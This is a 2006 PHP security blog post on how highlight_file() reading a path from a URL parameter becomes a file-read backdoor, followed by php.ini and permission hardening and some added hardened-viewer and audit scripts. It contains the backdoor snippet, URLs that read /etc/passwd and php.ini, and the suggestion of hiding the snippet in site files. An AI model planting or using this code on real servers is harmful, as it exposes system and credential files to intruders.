Function
[Backdoor Construction]
PHP is a very powerful language with many interesting features. One of them is a built-in PHP syntax highlighter, the function highlight_string: its argument is a string, and if that string contains PHP code the function highlights it and sends the result straight to the browser.
For example, the following code:
<?php
highlight_string('<?php phpinfo(); ?>');
?>
After execution, the output in the browser is:
<code><font color="#000000">
<font color="#0000BB"><?php phpinfo</font><font color="#007700">(); </font><font color="#0000BB">?></font>
</font>
</code>
The colours used for the highlighted code are set in php.ini, under the following options:
; highlight.string = #DD0000
; highlight.comment = #FF9900
; highlight.keyword = #007700
; highlight.bg = #FFFFFF
; highlight.default = #0000BB
; highlight.html = #000000
That highlights a string directly. What if I want to display an entire PHP file? There is a function for that too: highlight_file, whose argument is a file name or path. It works like the function above, except that it is given the path of a file.
This is where our little backdoor comes in: highlight_file can be used to read any file on the system that the web server is able to open. Let's construct a test script.
<?php
$file = $_GET['f'];
$file = $file ? $file : __FILE__;
highlight_file($file);
?>
What the code does: the URL supplies a variable named f holding the path of the PHP file to highlight, and the script passes it to highlight_file, which displays that file. I saved it as test.php in the public_html directory of my home directory.
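For comparison, here is the same viewer restricted so that the path from the URL can only name a .php file inside one fixed directory. This is an added example, not code from the original post; the examples directory, the .php-only rule and the 404 response are assumptions made for illustration.

```php
<?php
// Added example, not the original post's code: the same file viewer, but the
// path taken from the URL may only name a .php file under one fixed directory.
// VIEW_ROOT, the .php-only rule and the 404 response are assumptions.

define('VIEW_ROOT', __DIR__ . '/examples');

function resolve_viewable_file($requested, $root) {
    // ?f[]=x arrives as an array; only a non-empty plain string is acceptable.
    if (!is_string($requested) || $requested === '') return null;
    // A NUL byte would truncate the path inside the C-level file functions.
    if (strpos($requested, "\0") !== false) return null;
    $root = realpath($root);
    // realpath() resolves ../ and symlinks and returns false for missing files,
    // so "../../etc/passwd" becomes a canonical path that can be compared.
    $path = ($root === false) ? false : realpath($root . DIRECTORY_SEPARATOR . $requested);
    if ($path === false) return null;
    // The canonical path must start with the root plus a separator; the
    // separator stops /var/www/examples_private from matching /var/www/examples.
    $prefix = $root . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) return null;
    // Only regular .php files: never a directory and never a configuration file.
    if (!is_file($path) || strtolower(pathinfo($path, PATHINFO_EXTENSION)) !== 'php') return null;
    return $path;
}

$file = resolve_viewable_file(isset($_GET['f']) ? $_GET['f'] : '', VIEW_ROOT);
if ($file === null) {
    header('HTTP/1.1 404 Not Found');
    exit('No such example.');
}
highlight_file($file);
```

With this version, f=/etc/passwd and f=../../../etc/passwd both resolve to a path outside VIEW_ROOT (or to no file at all) and get a 404, while f=demo.php still shows examples/demo.php. The prefix check on the canonical path is the important part; checking the raw string for ".." is not enough because symlinks and encoded separators bypass it.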
Now open http://192.168.0.1/~heiyeluren/test.php in Firefox: it returns the contents of test.php itself. Next, let's read the passwd file: http://192.168.0.1/~heiyeluren/test.php?f=/etc/passwd
A long list of user accounts appears on the page immediately:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
......
Let's look at the PHP configuration file, php.ini:
http://192.168.0.1/~heiyeluren/test.php?f=/usr/local/php/lib/php.ini
It is displayed immediately:
[PHP]
;;;;;;;;;;;
; WARNING;
;;;;;;;;;;;
; This is the default settings file for new PHP installations.
; By default, PHP installs itself with a configuration suitable for
; development purposes, and *not* for production purposes.
; For several security-oriented considerations that should be taken
; Before going online with your site, please consult php.ini-recommended
; and http://php.net/manual/en/security.php.
......
It seems that, as long as the permissions allow, many files can be read directly, which is a serious threat to the system. In other words, if the code above is inserted into any directly accessible PHP file of the web site and triggered by a special parameter, a malicious user can view our system files at any time, from anywhere, and the average programmer is not careful enough to check every PHP file for it.
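Checking every PHP file by hand is the weak point the paragraph above describes, so here is a small audit script that does that check mechanically. It is an added example, not part of the original post: it walks a web root with PHP's own tokenizer, reports each file that calls one of the file-reading functions named in this article (plus show_source, the alias of highlight_file), and raises the severity when the same file also reads request input. The function list, the severity labels and the temporary sample files are assumptions for illustration.

```php
<?php
// Added audit helper, not code from the original post. It flags PHP files that
// call file-reading functions and notes whether the file also reads request
// input ($_GET/$_POST/$_REQUEST/$_COOKIE). The function list is an assumption.

const RISKY_FUNCTIONS = ['highlight_file', 'show_source', 'fopen', 'file',
                         'file_get_contents', 'readfile', 'opendir'];
const REQUEST_SUPERGLOBALS = ['$_GET', '$_POST', '$_REQUEST', '$_COOKIE'];

function scan_php_source(string $source): array {
    $calls = [];   // function name => line numbers where it is called
    $inputs = [];  // line numbers where a request superglobal is read
    $tokens = token_get_all($source);
    $n = count($tokens);
    for ($i = 0; $i < $n; $i++) {
        $tok = $tokens[$i];
        if (!is_array($tok)) continue;          // single-character tokens such as '(' or ';'
        [$id, $text, $line] = $tok;
        if ($id === T_VARIABLE && in_array($text, REQUEST_SUPERGLOBALS, true)) {
            $inputs[] = $line;
            continue;
        }
        // PHP 8 tokenizes \highlight_file as T_NAME_FULLY_QUALIFIED, older versions as T_STRING.
        $isName = $id === T_STRING
            || (defined('T_NAME_FULLY_QUALIFIED') && $id === T_NAME_FULLY_QUALIFIED);
        $name = strtolower(ltrim($text, '\\'));
        if (!$isName || !in_array($name, RISKY_FUNCTIONS, true)) continue;
        // A call needs an opening parenthesis after optional whitespace.
        $j = $i + 1;
        while ($j < $n && is_array($tokens[$j]) && $tokens[$j][0] === T_WHITESPACE) $j++;
        if ($j >= $n || $tokens[$j] !== '(') continue;
        // Skip $obj->file(), Foo::file() and "function file()" definitions.
        $k = $i - 1;
        while ($k >= 0 && is_array($tokens[$k]) && $tokens[$k][0] === T_WHITESPACE) $k--;
        $prev = $k >= 0 ? $tokens[$k] : null;
        if (is_array($prev) && in_array($prev[0], [T_OBJECT_OPERATOR, T_DOUBLE_COLON, T_FUNCTION], true)) continue;
        $calls[$name][] = $line;
    }
    return ['calls' => $calls, 'inputs' => array_values(array_unique($inputs))];
}

function scan_directory(string $root): array {
    $findings = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS));
    foreach ($it as $path => $info) {
        if (strtolower($info->getExtension()) !== 'php') continue;
        $result = scan_php_source(file_get_contents($path));
        if ($result['calls'] === []) continue;
        // A file-read fed by request input is the pattern from the post; a
        // file-read without request input still deserves a look.
        $result['severity'] = $result['inputs'] === [] ? 'review' : 'high';
        $findings[$path] = $result;
    }
    return $findings;
}

// Constructed sample web root (assumption): the viewer from the post plus a
// harmless page, written to a temporary directory so the scan runs offline.
$dir = sys_get_temp_dir() . '/scan_demo_' . getmypid();
mkdir($dir);
file_put_contents("$dir/test.php",
    "<?php\n\$file = \$_GET['f'];\n\$file = \$file ? \$file : __FILE__;\nhighlight_file(\$file);\n");
file_put_contents("$dir/index.php", "<?php\necho 'hello';\n");

foreach (scan_directory($dir) as $path => $f) {
    printf("%s [%s]\n", $path, $f['severity']);
    foreach ($f['calls'] as $fn => $lines) {
        printf("  %s() called at line(s) %s\n", $fn, implode(',', $lines));
    }
    if ($f['inputs'] !== []) {
        printf("  request input read at line(s) %s\n", implode(',', $f['inputs']));
    }
}
array_map('unlink', glob("$dir/*.php"));
rmdir($dir);
```

Run it from the command line against the real document root instead of the temporary directory to get a list to review; only test.php is reported in the sample above, as "high" because it both reads $_GET on line 2 and calls highlight_file() on line 4. The tokenizer approach avoids false hits on comments and string literals that a plain grep would produce, but it is a triage aid, not proof: a file that passes the value through several functions before the read still needs a human look.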
[System Guard]
So how do we prevent this, or similar problems? PHP has a great many file-access functions, such as file, file_get_contents, readfile and others; how do we stop these functions from becoming a threat?
Workaround One:
If the system only interacts with a database, you can block these file-access functions completely: fopen, file, file_get_contents, readfile, opendir and so on. This is done in the PHP configuration file php.ini, which has an option called disable_functions; list the functions to be blocked there:
disable_functions = highlight_file,fopen,file,file_get_contents,readfile,opendir
Those functions are then unavailable; if you call highlight_file, the PHP engine tells you:
Warning: highlight_file() has been disabled for security reasons in /home/heiyeluren/public_html/test.php on line 5
Of course we cannot disable everything; the point is to ban the functions that are rarely needed, and highlight_file, I think, is used comparatively rarely.
Workaround Two:
The first method is too heavy-handed: the functions become unusable, which is not acceptable for hosting providers. An alternative, again in php.ini, is to turn on PHP safe mode:
safe_mode = On
If needed, it is best to also configure open_basedir and related options for finer control; see the PHP manual for details. Keep in mind that safe_mode was deprecated in PHP 5.3 and removed in PHP 5.4, so on current versions open_basedir is the option that remains.
With safe mode on, we visit /etc/passwd again by submitting the URL:
http://192.168.0.1/~heiyeluren/test.php?f=/etc/passwd
The browser immediately shows:
Warning: highlight_file() [function.highlight-file]: SAFE MODE restriction in effect. The script whose uid is ??? allowed to access /etc/passwd owned by uid 0 in /home/heiyeluren/public_html/test.php on line 5
Workaround Three:
Without giving up PHP's powerful functions, so that they can still be used normally, the preventive measure is to set appropriate access permissions on the system's directories and files, such as /etc/passwd. Take php.ini, for example, whose default permissions are:
[~]# ls -al /usr/local/php/lib/php.ini
-rw-r--r-- 1 root root 41489 5 12:40 /usr/local/php/lib/php.ini
We change it so that it is no longer readable by everyone:
[~]# chmod 640 /usr/local/php/lib/php.ini
[~]# ls -al /usr/local/php/lib/php.ini
-rw-r----- 1 root root 1865 Nov 01:16 /usr/local/php/lib/php.ini
Now visit http://192.168.0.1/~heiyeluren/test.php?f=/usr/local/php/lib/php.ini and see:
Warning: highlight_file(/usr/local/php/lib/php.ini) [function.highlight-file]: failed to open stream: Permission denied in /home/heiyeluren/public_html/test.php on line 5
Warning: highlight_file() [function.highlight-file]: Failed opening '/usr/local/php/lib/php.ini' for highlighting in /home/heiyeluren/public_html/test.php on line 5
The warning says the script has no permission to read /usr/local/php/lib/php.ini: the file is now readable only by root and the root group, so the web server process, which should not be running as root, is denied. Our goal is achieved.
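The three workarounds can be verified from inside PHP rather than by trial requests. The following audit script is an added example, not part of the original post: it reports which of the file-reading functions are still callable despite disable_functions, whether open_basedir (or, on old versions, safe_mode) is set, and whether the sensitive files from this article are readable by the account running the script. The function list, the file list and the output format are assumptions; run it as the web server user (for example with sudo -u www-data php audit.php) so the permission checks reflect what a served script could read.

```php
<?php
// Added configuration audit, not code from the original post. It checks the
// three controls described in the article from inside PHP: disable_functions,
// safe_mode/open_basedir and file permissions. The lists below are assumptions.

const WANT_DISABLED = ['highlight_file', 'show_source', 'fopen', 'file',
                       'file_get_contents', 'readfile', 'opendir'];
const SENSITIVE_FILES = ['/etc/passwd', '/usr/local/php/lib/php.ini'];

function disabled_functions(): array {
    // disable_functions is a comma-separated list; tolerate spaces and an empty value.
    $list = array_map('trim', explode(',', (string) ini_get('disable_functions')));
    return array_values(array_filter($list, 'strlen'));
}

function still_enabled(array $want = WANT_DISABLED): array {
    $disabled = array_map('strtolower', disabled_functions());
    $out = [];
    foreach ($want as $fn) {
        // function_exists() returns false for a function that is disabled or
        // absent from this build, so the ini list and the live check must agree.
        if (!in_array($fn, $disabled, true) && function_exists($fn)) $out[] = $fn;
    }
    return $out;
}

function readable_by_this_user(array $files = SENSITIVE_FILES): array {
    $out = [];
    foreach ($files as $f) {
        // file_exists() also returns false for paths outside open_basedir.
        if (!file_exists($f)) { $out[$f] = 'absent or outside open_basedir'; continue; }
        $mode = fileperms($f) & 0777;
        // The lowest "r" bit (0004) means every local account, including the
        // web server's, can read the file; 0640 as in the article clears it.
        $world = ($mode & 0004) ? 'world-readable' : 'not world-readable';
        $out[$f] = sprintf('%04o %s, %s', $mode, $world,
                           is_readable($f) ? 'READABLE by this user' : 'denied to this user');
    }
    return $out;
}

function report(): string {
    $lines = [sprintf('PHP %s', PHP_VERSION)];
    $lines[] = 'open_basedir: ' . (ini_get('open_basedir') ?: '(not set)');
    // ini_get() returns false for a directive this PHP version does not know.
    $safe = ini_get('safe_mode');
    $lines[] = 'safe_mode: ' . ($safe === false
        ? '(directive not present in this PHP version)' : ($safe ? 'On' : 'Off'));
    $enabled = still_enabled();
    $lines[] = 'file-read functions still enabled: ' . ($enabled ? implode(', ', $enabled) : 'none');
    foreach (readable_by_this_user() as $file => $state) {
        $lines[] = sprintf('%-32s %s', $file, $state);
    }
    return implode("\n", $lines) . "\n";
}

echo report();
```

A php.ini that follows the article should make the script report highlight_file as disabled, open_basedir set to the site's directory, and php.ini as not world-readable and denied to the web server user; /etc/passwd is world-readable by design on most systems, which is exactly why the other two controls matter for it. Because the same checks run from the CLI and from a served page, you can also drop the script into the web root temporarily to confirm that the web server's php.ini (which is often a different file from the CLI one) carries the settings.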
Conclusion
PHP is very powerful, and I hope more developers realise this and adopt this powerful language early. A strong language naturally brings security problems too; whether we are developers or system administrators, we need to communicate closely to keep our systems both safe and easy to use. We must work hard to find a good balance between powerful features and security.
Written by Heiyeluren
2006-03-05 13:35